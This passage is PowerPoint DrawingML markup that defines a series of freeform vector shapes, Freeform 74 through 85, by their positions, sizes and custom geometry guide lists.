                  <a:gd name="T44" fmla="*/ 0 w 1701"/>
                  <a:gd name="T45" fmla="*/ 0 h 194"/>
                  <a:gd name="T46" fmla="*/ 0 w 1701"/>
                  <a:gd name="T47" fmla="*/ 0 h 194"/>
                  <a:gd name="T48" fmla="*/ 0 w 1701"/>
                  <a:gd name="T49" fmla="*/ 0 h 194"/>
                  <a:gd name="T50" fmla="*/ 0 w 1701"/>
                  <a:gd name="T51" fmla="*/ 0 h 194"/>
                  <a:gd name="T52" fmla="*/ 0 w 1701"/>
                  <a:gd name="T53" fmla="*/ 0 h 194"/>
                  <a:gd name="T54" fmla="*/ 0 w 1701"/>
                  <a:gd name="T55" fmla="*/ 0 h 194"/>
                  <a:gd name="T56" fmla="*/ 0 w 1701"/>
                  <a:gd name="T57" fmla="*/ 0 h 194"/>
                  <a:gd name="T58" fmla="*/ 0 w 1701"/>
                  <a:gd name="T59" fmla="*/ 0 h 194"/>
                  <a:gd name="T60" fmla="*/ 0 w 1701"/>
                  <a:gd name="T61" fmla="*/ 0 h 194"/>
                  <a:gd name="T62" fmla="*/ 0 w 1701"/>
                  <a:gd name="T63" fmla="*/ 0 h 194"/>
                  <a:gd name="T64" fmla="*/ 0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1" name="Freeform 74"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="942" y="3793"/>
                <a:ext cx="507" cy="57"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1521"/>
                  <a:gd name="T1" fmla="*/ 0 h 173"/>
                  <a:gd name="T2" fmla="*/ 0 w 1521"/>
                  <a:gd name="T3" fmla="*/ 0 h 173"/>
                  <a:gd name="T4" fmla="*/ 0 w 1521"/>
                  <a:gd name="T5" fmla="*/ 0 h 173"/>
                  <a:gd name="T6" fmla="*/ 0 w 1521"/>
                  <a:gd name="T7" fmla="*/ 0 h 173"/>
                  <a:gd name="T8" fmla="*/ 0 w 1521"/>
                  <a:gd name="T9" fmla="*/ 0 h 173"/>
                  <a:gd name="T10" fmla="*/ 0 w 1521"/>
                  <a:gd name="T11" fmla="*/ 0 h 173"/>
                  <a:gd name="T12" fmla="*/ 0 w 1521"/>
                  <a:gd name="T13" fmla="*/ 0 h 173"/>
                  <a:gd name="T14" fmla="*/ 0 w 1521"/>
                  <a:gd name="T15" fmla="*/ 0 h 173"/>
                  <a:gd name="T16" fmla="*/ 0 w 1521"/>
                  <a:gd name="T17" fmla="*/ 0 h 173"/>
                  <a:gd name="T18" fmla="*/ 0 w 1521"/>
                  <a:gd name="T19" fmla="*/ 0 h 173"/>
                  <a:gd name="T20" fmla="*/ 0 w 1521"/>
                  <a:gd name="T21" fmla="*/ 0 h 173"/>
                  <a:gd name="T22" fmla="*/ 0 w 1521"/>
                  <a:gd name="T23" fmla="*/ 0 h 173"/>
                  <a:gd name="T24" fmla="*/ 0 w 1521"/>
                  <a:gd name="T25" fmla="*/ 0 h 173"/>
                  <a:gd name="T26" fmla="*/ 0 w 1521"/>
                  <a:gd name="T27" fmla="*/ 0 h 173"/>
                  <a:gd name="T28" fmla="*/ 0 w 1521"/>
                  <a:gd name="T29" fmla="*/ 0 h 173"/>
                  <a:gd name="T30" fmla="*/ 0 w 1521"/>
                  <a:gd name="T31" fmla="*/ 0 h 173"/>
                  <a:gd name="T32" fmla="*/ 0 w 1521"/>
                  <a:gd name="T33" fmla="*/ 0 h 173"/>
                  <a:gd name="T34" fmla="*/ 0 w 1521"/>
                  <a:gd name="T35" fmla="*/ 0 h 173"/>
                  <a:gd name="T36" fmla="*/ 0 w 1521"/>
                  <a:gd name="T37" fmla="*/ 0 h 173"/>
                  <a:gd name="T38" fmla="*/ 0 w 1521"/>
                  <a:gd name="T39" fmla="*/ 0 h 173"/>
                  <a:gd name="T40" fmla="*/ 0 w 1521"/>
                  <a:gd name="T41" fmla="*/ 0 h 173"/>
                  <a:gd name="T42" fmla="*/ 0 w 1521"/>
                  <a:gd name="T43" fmla="*/ 0 h 173"/>
                  <a:gd name="T44" fmla="*/ 0 w 1521"/>
                  <a:gd name="T45" fmla="*/ 0 h 173"/>
                  <a:gd name="T46" fmla="*/ 0 w 1521"/>
                  <a:gd name="T47" fmla="*/ 0 h 173"/>
                  <a:gd name="T48" fmla="*/ 0 w 1521"/>
                  <a:gd name="T49" fmla="*/ 0 h 173"/>
                  <a:gd name="T50" fmla="*/ 0 w 1521"/>
                  <a:gd name="T51" fmla="*/ 0 h 173"/>
                  <a:gd name="T52" fmla="*/ 0 w 1521"/>
                  <a:gd name="T53" fmla="*/ 0 h 173"/>
                  <a:gd name="T54" fmla="*/ 0 w 1521"/>
                  <a:gd name="T55" fmla="*/ 0 h 173"/>
                  <a:gd name="T56" fmla="*/ 0 w 1521"/>
                  <a:gd name="T57" fmla="*/ 0 h 173"/>
                  <a:gd name="T58" fmla="*/ 0 w 1521"/>
                  <a:gd name="T59" fmla="*/ 0 h 173"/>
                  <a:gd name="T60" fmla="*/ 0 w 1521"/>
                  <a:gd name="T61" fmla="*/ 0 h 173"/>
                  <a:gd name="T62" fmla="*/ 0 w 1521"/>
                  <a:gd name="T63" fmla="*/ 0 h 173"/>
                  <a:gd name="T64" fmla="*/ 0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2" name="Freeform 75"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="798" y="3748"/>
                <a:ext cx="507" cy="57"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1521"/>
                  <a:gd name="T1" fmla="*/ 0 h 172"/>
                  <a:gd name="T2" fmla="*/ 0 w 1521"/>
                  <a:gd name="T3" fmla="*/ 0 h 172"/>
                  <a:gd name="T4" fmla="*/ 0 w 1521"/>
                  <a:gd name="T5" fmla="*/ 0 h 172"/>
                  <a:gd name="T6" fmla="*/ 0 w 1521"/>
                  <a:gd name="T7" fmla="*/ 0 h 172"/>
                  <a:gd name="T8" fmla="*/ 0 w 1521"/>
                  <a:gd name="T9" fmla="*/ 0 h 172"/>
                  <a:gd name="T10" fmla="*/ 0 w 1521"/>
                  <a:gd name="T11" fmla="*/ 0 h 172"/>
                  <a:gd name="T12" fmla="*/ 0 w 1521"/>
                  <a:gd name="T13" fmla="*/ 0 h 172"/>
                  <a:gd name="T14" fmla="*/ 0 w 1521"/>
                  <a:gd name="T15" fmla="*/ 0 h 172"/>
                  <a:gd name="T16" fmla="*/ 0 w 1521"/>
                  <a:gd name="T17" fmla="*/ 0 h 172"/>
                  <a:gd name="T18" fmla="*/ 0 w 1521"/>
                  <a:gd name="T19" fmla="*/ 0 h 172"/>
                  <a:gd name="T20" fmla="*/ 0 w 1521"/>
                  <a:gd name="T21" fmla="*/ 0 h 172"/>
                  <a:gd name="T22" fmla="*/ 0 w 1521"/>
                  <a:gd name="T23" fmla="*/ 0 h 172"/>
                  <a:gd name="T24" fmla="*/ 0 w 1521"/>
                  <a:gd name="T25" fmla="*/ 0 h 172"/>
                  <a:gd name="T26" fmla="*/ 0 w 1521"/>
                  <a:gd name="T27" fmla="*/ 0 h 172"/>
                  <a:gd name="T28" fmla="*/ 0 w 1521"/>
                  <a:gd name="T29" fmla="*/ 0 h 172"/>
                  <a:gd name="T30" fmla="*/ 0 w 1521"/>
                  <a:gd name="T31" fmla="*/ 0 h 172"/>
                  <a:gd name="T32" fmla="*/ 0 w 1521"/>
                  <a:gd name="T33" fmla="*/ 0 h 172"/>
                  <a:gd name="T34" fmla="*/ 0 w 1521"/>
                  <a:gd name="T35" fmla="*/ 0 h 172"/>
                  <a:gd name="T36" fmla="*/ 0 w 1521"/>
                  <a:gd name="T37" fmla="*/ 0 h 172"/>
                  <a:gd name="T38" fmla="*/ 0 w 1521"/>
                  <a:gd name="T39" fmla="*/ 0 h 172"/>
                  <a:gd name="T40" fmla="*/ 0 w 1521"/>
                  <a:gd name="T41" fmla="*/ 0 h 172"/>
                  <a:gd name="T42" fmla="*/ 0 w 1521"/>
                  <a:gd name="T43" fmla="*/ 0 h 172"/>
                  <a:gd name="T44" fmla="*/ 0 w 1521"/>
                  <a:gd name="T45" fmla="*/ 0 h 172"/>
                  <a:gd name="T46" fmla="*/ 0 w 1521"/>
                  <a:gd name="T47" fmla="*/ 0 h 172"/>
                  <a:gd name="T48" fmla="*/ 0 w 1521"/>
                  <a:gd name="T49" fmla="*/ 0 h 172"/>
                  <a:gd name="T50" fmla="*/ 0 w 1521"/>
                  <a:gd name="T51" fmla="*/ 0 h 172"/>
                  <a:gd name="T52" fmla="*/ 0 w 1521"/>
                  <a:gd name="T53" fmla="*/ 0 h 172"/>
                  <a:gd name="T54" fmla="*/ 0 w 1521"/>
                  <a:gd name="T55" fmla="*/ 0 h 172"/>
                  <a:gd name="T56" fmla="*/ 0 w 1521"/>
                  <a:gd name="T57" fmla="*/ 0 h 172"/>
                  <a:gd name="T58" fmla="*/ 0 w 1521"/>
                  <a:gd name="T59" fmla="*/ 0 h 172"/>
                  <a:gd name="T60" fmla="*/ 0 w 1521"/>
                  <a:gd name="T61" fmla="*/ 0 h 172"/>
                  <a:gd name="T62" fmla="*/ 0 w 1521"/>
                  <a:gd name="T63" fmla="*/ 0 h 172"/>
                  <a:gd name="T64" fmla="*/ 0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3" name="Freeform 76"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="846" y="3194"/>
                <a:ext cx="114" cy="43"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 342"/>
                  <a:gd name="T1" fmla="*/ 0 h 131"/>
                  <a:gd name="T2" fmla="*/ 0 w 342"/>
                  <a:gd name="T3" fmla="*/ 0 h 131"/>
                  <a:gd name="T4" fmla="*/ 0 w 342"/>
                  <a:gd name="T5" fmla="*/ 0 h 131"/>
                  <a:gd name="T6" fmla="*/ 0 w 342"/>
                  <a:gd name="T7" fmla="*/ 0 h 131"/>
                  <a:gd name="T8" fmla="*/ 0 w 342"/>
                  <a:gd name="T9" fmla="*/ 0 h 131"/>
                  <a:gd name="T10" fmla="*/ 0 w 342"/>
                  <a:gd name="T11" fmla="*/ 0 h 131"/>
                  <a:gd name="T12" fmla="*/ 0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4" name="Freeform 77"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1144" y="3197"/>
                <a:ext cx="131" cy="50"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 393"/>
                  <a:gd name="T1" fmla="*/ 0 h 149"/>
                  <a:gd name="T2" fmla="*/ 0 w 393"/>
                  <a:gd name="T3" fmla="*/ 0 h 149"/>
                  <a:gd name="T4" fmla="*/ 0 w 393"/>
                  <a:gd name="T5" fmla="*/ 0 h 149"/>
                  <a:gd name="T6" fmla="*/ 0 w 393"/>
                  <a:gd name="T7" fmla="*/ 0 h 149"/>
                  <a:gd name="T8" fmla="*/ 0 w 393"/>
                  <a:gd name="T9" fmla="*/ 0 h 149"/>
                  <a:gd name="T10" fmla="*/ 0 w 393"/>
                  <a:gd name="T11" fmla="*/ 0 h 149"/>
                  <a:gd name="T12" fmla="*/ 0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5" name="Freeform 78"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1134" y="3236"/>
                <a:ext cx="144" cy="61"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 434"/>
                  <a:gd name="T1" fmla="*/ 0 h 185"/>
                  <a:gd name="T2" fmla="*/ 0 w 434"/>
                  <a:gd name="T3" fmla="*/ 0 h 185"/>
                  <a:gd name="T4" fmla="*/ 0 w 434"/>
                  <a:gd name="T5" fmla="*/ 0 h 185"/>
                  <a:gd name="T6" fmla="*/ 0 w 434"/>
                  <a:gd name="T7" fmla="*/ 0 h 185"/>
                  <a:gd name="T8" fmla="*/ 0 w 434"/>
                  <a:gd name="T9" fmla="*/ 0 h 185"/>
                  <a:gd name="T10" fmla="*/ 0 w 434"/>
                  <a:gd name="T11" fmla="*/ 0 h 185"/>
                  <a:gd name="T12" fmla="*/ 0 w 434"/>
                  <a:gd name="T13" fmla="*/ 0 h 185"/>
                  <a:gd name="T14" fmla="*/ 0 w 434"/>
                  <a:gd name="T15" fmla="*/ 0 h 185"/>
                  <a:gd name="T16" fmla="*/ 0 w 434"/>
                  <a:gd name="T17" fmla="*/ 0 h 185"/>
                  <a:gd name="T18" fmla="*/ 0 w 434"/>
                  <a:gd name="T19" fmla="*/ 0 h 185"/>
                  <a:gd name="T20" fmla="*/ 0 w 434"/>
                  <a:gd name="T21" fmla="*/ 0 h 185"/>
                  <a:gd name="T22" fmla="*/ 0 w 434"/>
                  <a:gd name="T23" fmla="*/ 0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6" name="Freeform 79"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1123" y="3092"/>
                <a:ext cx="179" cy="163"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 538"/>
                  <a:gd name="T1" fmla="*/ 0 h 489"/>
                  <a:gd name="T2" fmla="*/ 0 w 538"/>
                  <a:gd name="T3" fmla="*/ 0 h 489"/>
                  <a:gd name="T4" fmla="*/ 0 w 538"/>
                  <a:gd name="T5" fmla="*/ 0 h 489"/>
                  <a:gd name="T6" fmla="*/ 0 w 538"/>
                  <a:gd name="T7" fmla="*/ 0 h 489"/>
                  <a:gd name="T8" fmla="*/ 0 w 538"/>
                  <a:gd name="T9" fmla="*/ 0 h 489"/>
                  <a:gd name="T10" fmla="*/ 0 w 538"/>
                  <a:gd name="T11" fmla="*/ 0 h 489"/>
                  <a:gd name="T12" fmla="*/ 0 w 538"/>
                  <a:gd name="T13" fmla="*/ 0 h 489"/>
                  <a:gd name="T14" fmla="*/ 0 w 538"/>
                  <a:gd name="T15" fmla="*/ 0 h 489"/>
                  <a:gd name="T16" fmla="*/ 0 w 538"/>
                  <a:gd name="T17" fmla="*/ 0 h 489"/>
                  <a:gd name="T18" fmla="*/ 0 w 538"/>
                  <a:gd name="T19" fmla="*/ 0 h 489"/>
                  <a:gd name="T20" fmla="*/ 0 w 538"/>
                  <a:gd name="T21" fmla="*/ 0 h 489"/>
                  <a:gd name="T22" fmla="*/ 0 w 538"/>
                  <a:gd name="T23" fmla="*/ 0 h 489"/>
                  <a:gd name="T24" fmla="*/ 0 w 538"/>
                  <a:gd name="T25" fmla="*/ 0 h 489"/>
                  <a:gd name="T26" fmla="*/ 0 w 538"/>
                  <a:gd name="T27" fmla="*/ 0 h 489"/>
                  <a:gd name="T28" fmla="*/ 0 w 538"/>
                  <a:gd name="T29" fmla="*/ 0 h 489"/>
                  <a:gd name="T30" fmla="*/ 0 w 538"/>
                  <a:gd name="T31" fmla="*/ 0 h 489"/>
                  <a:gd name="T32" fmla="*/ 0 w 538"/>
                  <a:gd name="T33" fmla="*/ 0 h 489"/>
                  <a:gd name="T34" fmla="*/ 0 w 538"/>
                  <a:gd name="T35" fmla="*/ 0 h 489"/>
                  <a:gd name="T36" fmla="*/ 0 w 538"/>
                  <a:gd name="T37" fmla="*/ 0 h 489"/>
                  <a:gd name="T38" fmla="*/ 0 w 538"/>
                  <a:gd name="T39" fmla="*/ 0 h 489"/>
                  <a:gd name="T40" fmla="*/ 0 w 538"/>
                  <a:gd name="T41" fmla="*/ 0 h 489"/>
                  <a:gd name="T42" fmla="*/ 0 w 538"/>
                  <a:gd name="T43" fmla="*/ 0 h 489"/>
                  <a:gd name="T44" fmla="*/ 0 w 538"/>
                  <a:gd name="T45" fmla="*/ 0 h 489"/>
                  <a:gd name="T46" fmla="*/ 0 w 538"/>
                  <a:gd name="T47" fmla="*/ 0 h 489"/>
                  <a:gd name="T48" fmla="*/ 0 w 538"/>
                  <a:gd name="T49" fmla="*/ 0 h 489"/>
                  <a:gd name="T50" fmla="*/ 0 w 538"/>
                  <a:gd name="T51" fmla="*/ 0 h 489"/>
                  <a:gd name="T52" fmla="*/ 0 w 538"/>
                  <a:gd name="T53" fmla="*/ 0 h 489"/>
                  <a:gd name="T54" fmla="*/ 0 w 538"/>
                  <a:gd name="T55" fmla="*/ 0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7" name="Freeform 80"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="821" y="3101"/>
                <a:ext cx="197" cy="153"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 590"/>
                  <a:gd name="T1" fmla="*/ 0 h 460"/>
                  <a:gd name="T2" fmla="*/ 0 w 590"/>
                  <a:gd name="T3" fmla="*/ 0 h 460"/>
                  <a:gd name="T4" fmla="*/ 0 w 590"/>
                  <a:gd name="T5" fmla="*/ 0 h 460"/>
                  <a:gd name="T6" fmla="*/ 0 w 590"/>
                  <a:gd name="T7" fmla="*/ 0 h 460"/>
                  <a:gd name="T8" fmla="*/ 0 w 590"/>
                  <a:gd name="T9" fmla="*/ 0 h 460"/>
                  <a:gd name="T10" fmla="*/ 0 w 590"/>
                  <a:gd name="T11" fmla="*/ 0 h 460"/>
                  <a:gd name="T12" fmla="*/ 0 w 590"/>
                  <a:gd name="T13" fmla="*/ 0 h 460"/>
                  <a:gd name="T14" fmla="*/ 0 w 590"/>
                  <a:gd name="T15" fmla="*/ 0 h 460"/>
                  <a:gd name="T16" fmla="*/ 0 w 590"/>
                  <a:gd name="T17" fmla="*/ 0 h 460"/>
                  <a:gd name="T18" fmla="*/ 0 w 590"/>
                  <a:gd name="T19" fmla="*/ 0 h 460"/>
                  <a:gd name="T20" fmla="*/ 0 w 590"/>
                  <a:gd name="T21" fmla="*/ 0 h 460"/>
                  <a:gd name="T22" fmla="*/ 0 w 590"/>
                  <a:gd name="T23" fmla="*/ 0 h 460"/>
                  <a:gd name="T24" fmla="*/ 0 w 590"/>
                  <a:gd name="T25" fmla="*/ 0 h 460"/>
                  <a:gd name="T26" fmla="*/ 0 w 590"/>
                  <a:gd name="T27" fmla="*/ 0 h 460"/>
                  <a:gd name="T28" fmla="*/ 0 w 590"/>
                  <a:gd name="T29" fmla="*/ 0 h 460"/>
                  <a:gd name="T30" fmla="*/ 0 w 590"/>
                  <a:gd name="T31" fmla="*/ 0 h 460"/>
                  <a:gd name="T32" fmla="*/ 0 w 590"/>
                  <a:gd name="T33" fmla="*/ 0 h 460"/>
                  <a:gd name="T34" fmla="*/ 0 w 590"/>
                  <a:gd name="T35" fmla="*/ 0 h 460"/>
                  <a:gd name="T36" fmla="*/ 0 w 590"/>
                  <a:gd name="T37" fmla="*/ 0 h 460"/>
                  <a:gd name="T38" fmla="*/ 0 w 590"/>
                  <a:gd name="T39" fmla="*/ 0 h 460"/>
                  <a:gd name="T40" fmla="*/ 0 w 590"/>
                  <a:gd name="T41" fmla="*/ 0 h 460"/>
                  <a:gd name="T42" fmla="*/ 0 w 590"/>
                  <a:gd name="T43" fmla="*/ 0 h 460"/>
                  <a:gd name="T44" fmla="*/ 0 w 590"/>
                  <a:gd name="T45" fmla="*/ 0 h 460"/>
                  <a:gd name="T46" fmla="*/ 0 w 590"/>
                  <a:gd name="T47" fmla="*/ 0 h 460"/>
                  <a:gd name="T48" fmla="*/ 0 w 590"/>
                  <a:gd name="T49" fmla="*/ 0 h 460"/>
                  <a:gd name="T50" fmla="*/ 0 w 590"/>
                  <a:gd name="T51" fmla="*/ 0 h 460"/>
                  <a:gd name="T52" fmla="*/ 0 w 590"/>
                  <a:gd name="T53" fmla="*/ 0 h 460"/>
                  <a:gd name="T54" fmla="*/ 0 w 590"/>
                  <a:gd name="T55" fmla="*/ 0 h 460"/>
                  <a:gd name="T56" fmla="*/ 0 w 590"/>
                  <a:gd name="T57" fmla="*/ 0 h 460"/>
                  <a:gd name="T58" fmla="*/ 0 w 590"/>
                  <a:gd name="T59" fmla="*/ 0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8" name="Freeform 81"/>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0 w 185"/>
                  <a:gd name="T9" fmla="*/ 0 h 172"/>
                  <a:gd name="T10" fmla="*/ 0 w 185"/>
                  <a:gd name="T11" fmla="*/ 0 h 172"/>
                  <a:gd name="T12" fmla="*/ 0 w 185"/>
                  <a:gd name="T13" fmla="*/ 0 h 172"/>
                  <a:gd name="T14" fmla="*/ 0 w 185"/>
                  <a:gd name="T15" fmla="*/ 0 h 172"/>
                  <a:gd name="T16" fmla="*/ 0 w 185"/>
                  <a:gd name="T17" fmla="*/ 0 h 172"/>
                  <a:gd name="T18" fmla="*/ 0 w 185"/>
                  <a:gd name="T19" fmla="*/ 0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69" name="Freeform 82"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1160" y="3195"/>
                <a:ext cx="66" cy="45"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 200"/>
                  <a:gd name="T1" fmla="*/ 0 h 136"/>
                  <a:gd name="T2" fmla="*/ 0 w 200"/>
                  <a:gd name="T3" fmla="*/ 0 h 136"/>
                  <a:gd name="T4" fmla="*/ 0 w 200"/>
                  <a:gd name="T5" fmla="*/ 0 h 136"/>
                  <a:gd name="T6" fmla="*/ 0 w 200"/>
                  <a:gd name="T7" fmla="*/ 0 h 136"/>
                  <a:gd name="T8" fmla="*/ 0 w 200"/>
                  <a:gd name="T9" fmla="*/ 0 h 136"/>
                  <a:gd name="T10" fmla="*/ 0 w 200"/>
                  <a:gd name="T11" fmla="*/ 0 h 136"/>
                  <a:gd name="T12" fmla="*/ 0 w 200"/>
                  <a:gd name="T13" fmla="*/ 0 h 136"/>
                  <a:gd name="T14" fmla="*/ 0 w 200"/>
                  <a:gd name="T15" fmla="*/ 0 h 136"/>
                  <a:gd name="T16" fmla="*/ 0 w 200"/>
                  <a:gd name="T17" fmla="*/ 0 h 136"/>
                  <a:gd name="T18" fmla="*/ 0 w 200"/>
                  <a:gd name="T19" fmla="*/ 0 h 136"/>
                  <a:gd name="T20" fmla="*/ 0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0" name="Freeform 83"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="454" y="3237"/>
                <a:ext cx="443" cy="238"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1330"/>
                  <a:gd name="T1" fmla="*/ 0 h 714"/>
                  <a:gd name="T2" fmla="*/ 0 w 1330"/>
                  <a:gd name="T3" fmla="*/ 0 h 714"/>
                  <a:gd name="T4" fmla="*/ 0 w 1330"/>
                  <a:gd name="T5" fmla="*/ 0 h 714"/>
                  <a:gd name="T6" fmla="*/ 0 w 1330"/>
                  <a:gd name="T7" fmla="*/ 0 h 714"/>
                  <a:gd name="T8" fmla="*/ 0 w 1330"/>
                  <a:gd name="T9" fmla="*/ 0 h 714"/>
                  <a:gd name="T10" fmla="*/ 0 w 1330"/>
                  <a:gd name="T11" fmla="*/ 0 h 714"/>
                  <a:gd name="T12" fmla="*/ 0 w 1330"/>
                  <a:gd name="T13" fmla="*/ 0 h 714"/>
                  <a:gd name="T14" fmla="*/ 0 w 1330"/>
                  <a:gd name="T15" fmla="*/ 0 h 714"/>
                  <a:gd name="T16" fmla="*/ 0 w 1330"/>
                  <a:gd name="T17" fmla="*/ 0 h 714"/>
                  <a:gd name="T18" fmla="*/ 0 w 1330"/>
                  <a:gd name="T19" fmla="*/ 0 h 714"/>
                  <a:gd name="T20" fmla="*/ 0 w 1330"/>
                  <a:gd name="T21" fmla="*/ 0 h 714"/>
                  <a:gd name="T22" fmla="*/ 0 w 1330"/>
                  <a:gd name="T23" fmla="*/ 0 h 714"/>
                  <a:gd name="T24" fmla="*/ 0 w 1330"/>
                  <a:gd name="T25" fmla="*/ 0 h 714"/>
                  <a:gd name="T26" fmla="*/ 0 w 1330"/>
                  <a:gd name="T27" fmla="*/ 0 h 714"/>
                  <a:gd name="T28" fmla="*/ 0 w 1330"/>
                  <a:gd name="T29" fmla="*/ 0 h 714"/>
                  <a:gd name="T30" fmla="*/ 0 w 1330"/>
                  <a:gd name="T31" fmla="*/ 0 h 714"/>
                  <a:gd name="T32" fmla="*/ 0 w 1330"/>
                  <a:gd name="T33" fmla="*/ 0 h 714"/>
                  <a:gd name="T34" fmla="*/ 0 w 1330"/>
                  <a:gd name="T35" fmla="*/ 0 h 714"/>
                  <a:gd name="T36" fmla="*/ 0 w 1330"/>
                  <a:gd name="T37" fmla="*/ 0 h 714"/>
                  <a:gd name="T38" fmla="*/ 0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1" name="Freeform 84"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="510" y="3225"/>
                <a:ext cx="407" cy="239"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1220"/>
                  <a:gd name="T1" fmla="*/ 0 h 716"/>
                  <a:gd name="T2" fmla="*/ 0 w 1220"/>
                  <a:gd name="T3" fmla="*/ 0 h 716"/>
                  <a:gd name="T4" fmla="*/ 0 w 1220"/>
                  <a:gd name="T5" fmla="*/ 0 h 716"/>
                  <a:gd name="T6" fmla="*/ 0 w 1220"/>
                  <a:gd name="T7" fmla="*/ 0 h 716"/>
                  <a:gd name="T8" fmla="*/ 0 w 1220"/>
                  <a:gd name="T9" fmla="*/ 0 h 716"/>
                  <a:gd name="T10" fmla="*/ 0 w 1220"/>
                  <a:gd name="T11" fmla="*/ 0 h 716"/>
                  <a:gd name="T12" fmla="*/ 0 w 1220"/>
                  <a:gd name="T13" fmla="*/ 0 h 716"/>
                  <a:gd name="T14" fmla="*/ 0 w 1220"/>
                  <a:gd name="T15" fmla="*/ 0 h 716"/>
                  <a:gd name="T16" fmla="*/ 0 w 1220"/>
                  <a:gd name="T17" fmla="*/ 0 h 716"/>
                  <a:gd name="T18" fmla="*/ 0 w 1220"/>
                  <a:gd name="T19" fmla="*/ 0 h 716"/>
                  <a:gd name="T20" fmla="*/ 0 w 1220"/>
                  <a:gd name="T21" fmla="*/ 0 h 716"/>
                  <a:gd name="T22" fmla="*/ 0 w 1220"/>
                  <a:gd name="T23" fmla="*/ 0 h 716"/>
                  <a:gd name="T24" fmla="*/ 0 w 1220"/>
                  <a:gd name="T25" fmla="*/ 0 h 716"/>
                  <a:gd name="T26" fmla="*/ 0 w 1220"/>
                  <a:gd name="T27" fmla="*/ 0 h 716"/>
                  <a:gd name="T28" fmla="*/ 0 w 1220"/>
                  <a:gd name="T29" fmla="*/ 0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2" name="Freeform 85"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="432" y="3235"/>
                <a:ext cx="457" cy="247"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1371"/>
                  <a:gd name="T1" fmla="*/ 0 h 741"/>
                  <a:gd name="T2" fmla="*/ 0 w 1371"/>
                  <a:gd name="T3" fmla="*/ 0 h 741"/>
                  <a:gd name="T4" fmla="*/ 0 w 1371"/>
                  <a:gd name="T5" fmla="*/ 0 h 741"/>
                  <a:gd name="T6" fmla="*/ 0 w 1371"/>
                  <a:gd name="T7" fmla="*/ 0 h 741"/>
                  <a:gd name="T8" fmla="*/ 0 w 1371"/>
                  <a:gd name="T9" fmla="*/ 0 h 741"/>
                  <a:gd name="T10" fmla="*/ 0 w 1371"/>
                  <a:gd name="T11" fmla="*/ 0 h 741"/>
                  <a:gd name="T12" fmla="*/ 0 w 1371"/>
                  <a:gd name="T13" fmla="*/ 0 h 741"/>
                  <a:gd name="T14" fmla="*/ 0 w 1371"/>
                  <a:gd name="T15" fmla="*/ 0 h 741"/>
                  <a:gd name="T16" fmla="*/ 0 w 1371"/>
                  <a:gd name="T17" fmla="*/ 0 h 741"/>
                  <a:gd name="T18" fmla="*/ 0 w 1371"/>
                  <a:gd name="T19" fmla="*/ 0 h 741"/>
                  <a:gd name="T20" fmla="*/ 0 w 1371"/>
                  <a:gd name="T21" fmla="*/ 0 h 741"/>
                  <a:gd name="T22" fmla="*/ 0 w 1371"/>
                  <a:gd name="T23" fmla="*/ 0 h 741"/>
                  <a:gd name="T24" fmla="*/ 0 w 1371"/>
                  <a:gd name="T25" fmla="*/ 0 h 741"/>
                  <a:gd name="T26" fmla="*/ 0 w 1371"/>
                  <a:gd name="T27" fmla="*/ 0 h 741"/>
                  <a:gd name="T28" fmla="*/ 0 w 1371"/>
                  <a:gd name="T29" fmla="*/ 0 h 741"/>
                  <a:gd name="T30" fmla="*/ 0 w 1371"/>
                  <a:gd name="T31" fmla="*/ 0 h 741"/>
                  <a:gd name="T32" fmla="*/ 0 w 1371"/>
                  <a:gd name="T33" fmla="*/ 0 h 741"/>
                  <a:gd name="T34" fmla="*/ 0 w 1371"/>
                  <a:gd name="T35" fmla="*/ 0 h 741"/>
                  <a:gd name="T36" fmla="*/ 0 w 1371"/>
                  <a:gd name="T37" fmla="*/ 0 h 741"/>
